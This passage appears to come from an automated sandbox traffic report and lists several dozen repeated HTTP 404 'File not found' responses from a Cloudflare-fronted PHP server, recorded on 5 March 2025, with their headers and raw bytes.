cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1951&rtt_var=975&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CJ3mGUvctciN0lY1e8iSRVeNCvzV8itvTVOA3PQdLDZ3hCPIrVUMFOK%2BE9I0UEYB6%2BoRs9Godp7AgSprt6IdW%2F074bl%2FKdKJedHt22KhthcAqUx4R549IrCuvRg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3f62bf8fc358-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1671&min_rtt=1671&rtt_var=835&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0WeAJZQxNBUD4zho9MccQ1TBmSi5jjqHVS1ERvYRmc%2Bu2fjp9wabhgoVqkvNFrBEfhh%2Bm7iNjhBWpRc4QQl%2FobYYXVoTaijOvsdAYQaUr3ow%2BPhNNAOuwtlAZzk%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3f7b0b617c6a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2061&min_rtt=2061&rtt_var=1030&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:25 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iGfjFdQFQZfu%2B%2FX%2B0BHKAl4mRx3l6cCiaDaA8gds8lJAdSegAKBcllNbKkazKZM1hnnIWwx%2Fv%2FR6KpL4tv%2F8ak6Phk5IXYlwsaHQbKO4DXohM12ClBPYajn9P64%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3f8c183a42e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1740&min_rtt=1740&rtt_var=870&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AOWqy3uBYSD2xA2no%2F8EAfnqKpjgaXbOhD2Dh42asbUqizRNpCJn9pry3p613di5yuyxN3S%2BqfphosDYKb73xHA1BI9TQU35bosIo%2FjEexvNAkwRaSHQVPwpK6k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3f9c38b842e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1710&rtt_var=855&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CIBHSCuMdtCVhm3lxnG4ifH5hvMRcT0qB1CwePVvrr0Im1XwcFsolYizH4wBZYKUw5cGwIF0kMUiUiAZlCpeloZnZz54yCRyGuOfL7WvBlf06eqDGWLrxIRDTRo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3fa12bcb4414-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1614&rtt_var=807&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VFPFTl9LZ%2BuHo0XH1glFUtT1CjB5kpM2uJJeZCJVimqSrgVXcV8T5vnenhQ2mlg3v%2FQZ20aWEgxG%2FWi3oyngk4%2F%2BqsXObPbO6CaLSKcPWz%2FtunCMmh1cnnNDCEs%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3fb3be47c358-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1590&rtt_var=795&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WW0cVxYMqAcdTE3ar8%2FO6PpJZx1yZ2q1Emd7qLNBqxeUXzQvUzEYvYnti6Iz363yjpapNylvjAWMFX8tMhYIFT9J5Z88AL52MW4RU3aEwMtuaGz8RSXCcYfqJOQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3fb99c1ede95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=3022&min_rtt=3022&rtt_var=1511&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=119&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=niHV73bSgvf3vOJIco5101zFnma%2BcZSBc8kD09b9gcnJAAUFvosciX9aX7Z3r%2BhSHAd9f%2BDBdJFhpYmuILJukg3wdE2wDQPTtBvjvYVyAt%2BqerKW%2F%2B0%2FfQtMgWo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3fbf7fc1c358-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2789&min_rtt=2789&rtt_var=1394&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pqOd3b5tBhiDs34ezMfrcb%2FDpUSiVGARlHiQpem%2B0T9fHAvVJr2XBzjwL%2FPGr%2FgvSN6Tcw%2BfaGSmqwkE7jqyNlZ3sefGYhTazCe9CIH8YtjbbmZ%2FjV44wyCrPwA%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3fcb7c4714a8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2895&min_rtt=2895&rtt_var=1447&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:38 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gTd4SKTvjIkKOmoYe0Z0jQiHaXglzCFLaru8r4kwo7saY%2Bdu1gpuhS1Lsp0dxZ5nRFZT76gcqX80hn134LxsEhg1G6JzQ45ZRX7rS4ozQfgAXwTSLDP8nwyMxNY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3fd91c118ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1983&min_rtt=1983&rtt_var=991&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:39 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SHLZU5Sx5XCVuVmzuvOYVAJ1C%2B5e2n0o3Ti94%2BYAHl2dymObSYs%2BUjzSKMVwSHcNmwpaHL%2B%2BPe9L3TekDInfTNeYOTz0b1bzmtvSprCYhPDiPpQ3liKtLa2oH8I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3fdf08fe8ae3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2027&min_rtt=2027&rtt_var=1013&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:41 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pizF%2BNUcNTI%2BMRg%2F%2BB9gk0Fqu2JgePnUYPgrGVAk20aR8fjllwFg9fvzN6OrYU7g8xCQsa20ZoAJa7aaM0kmQ%2FncuSPu%2FU4yOIlJ8hYAHb6GcupSDmqRCJw7%2FoQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3fed9cb242e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1717&rtt_var=858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:42 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oVzZXnoHp8eomVR%2Fpu00bXWMCiLjaxWSu7H6wRR2x1yI8Fg5pgBiCeqOpiUVhZ3R%2BewVvPgaAFESFPtMxjMq550Rchic5k%2Bzu0T6W64yQeb7uStZe9GLYj3GJTE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3ff3aeedc358-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1627&rtt_var=813&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:43 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MCpK2VaSM5uZOW1TfNYNTerACRku%2FXW4wEKQflAZvAkkbGOLDgDTDbC%2BYuL%2FxiUnCfRzPM16JwBxyOW1M8iTW4ANPhVSKkj4Ww0Z0NQ%2B8H0Y9peqRiVtglSbw3Q%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba3ff97b1414a8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1983&min_rtt=1983&rtt_var=991&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:44 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d5j%2FehEar97akzoO7YkiLbNfJSDgA5AgT%2FQIS%2BEiEdROEcTz8PO1CwD70A4ZqmLVsJkot01Dv0mYgZ8Ck9Wzp%2Bhr9A%2BWswCSTlVErd%2BF3nmQoGq3ulqf1oLPwkQ%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40003aaf42e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1626&rtt_var=813&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:47 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FItNOoiIkB7RQYvB5faWGqo3G6ngEo0vhDYNUaZmKw%2Br6mdMaDoyEO4csV5LMvIpZ6m7zqx2RfXsSTb8%2BM6RKkSsaa7xESkVmHPbUCTDTp7DKoZP2xRuwECuFME%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40123c5a4414-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1687&min_rtt=1687&rtt_var=843&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:51 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FPuiWjcz93ytrrFDYGg34uQSUOQYQYSDqnk3IrPMdZSrCFKZ7Gvd344v%2BEmeewyO44aFM6%2BA28vsxWuZf6Okv5gMnRyXvIW6kGPQbUhCiCSYNpsl9PoSmwRVCNM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba402acbfc14a8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2037&min_rtt=2037&rtt_var=1018&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:53 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6EvhVN0kMzQYN6Ce%2F1I3LNq88379qbDKCjohKrc15pHLcaTXjIYinklA98Cocnddms33wNv5b1Bq%2F%2FYarp3owAvZPolVaCbE3fz9Oz3jaxDhRdLPMTLBdWFdrnc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba4036bb5242e9-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1722&min_rtt=1722&rtt_var=861&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:54 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uQb%2BqLtSuOeT5UTdN07MoBeAg%2B5AFX7DzHX6x0KRzbUJzmkY3q%2F6aFFHqimjHfj8TjJt8Fvwiy5Uwyti7S7BPZNZ66klyW1apKXqJ820bN28fnnsyYlBJLF62d0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba403f2959c358-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1649&rtt_var=824&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:55 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ijTwPNPuedmANqmkXCgNwK2vwUoWFg5DayAvFhOR0y%2BV5cAzR7W6Zzrs6uwDf2FFWHVKSgw0iIB5rccL4uTkYDgM1YBNwWa6ZUuT2cj9uT%2BteOpOB%2BhrqIydRzY%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba4044fd9dc358-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1699&min_rtt=1699&rtt_var=849&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:57 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=otRB97SB0h4zymaD0hixFcxPC3S%2FTPPUF3dF7eYeOyQygc4hVTEcS05sCl5kPGm4bVUiu9zYH2NVZO2s1GGX8xmTaQ7yowdh6%2FAWVFbeAM%2FcibAKhIOun1oCPwo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba4051887e8ae3-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2084&min_rtt=2084&rtt_var=1042&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:58 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FKvgruHh%2Faaee4VYoaCz%2BklRvDyzsrfenqHkZftlQikO%2B6NEoynh7yHOZgMrJYEQu5AiRWcKHKHTJAD3XaVPSkn%2FNJLitj1t5Od7fULCUy67UiDt6hIuwrSlZjM%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba40579d44c358-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1652&min_rtt=1652&rtt_var=826&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=150&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:19:59 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jMBfUX%2BPcCgH0nR7HrC3z%2BgI5PJv6AFDpvIrvH0Q13gQEOlnDjkiQkw11p%2F8uicj9X0FYR3YM2f79msZ8hF6%2BicJESKN2D6ZaB96zXskWRzraDEqv36%2B2Op%2Ff%2BI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba405cfbcb8ca1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1941&min_rtt=1941&rtt_var=970&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Mar 2025 14:20:01 GMTContent-Type: text/html; charset=UTF-8Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not Foundcf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MbyQZj5lkKGuM5dpZyHXcjGFZChF2kZjGNAqvg91%2BLEdogzOA1SP7Jh2vx1L8AAoqD6reAE2LBL2UtzgRu%2FKdm39GIffrtsAaZehZcs5VL8zWtESO4NIINKHR2k%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ba4068cb977c6a-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1965&min_rtt=1965&rtt_var=982&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=399&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
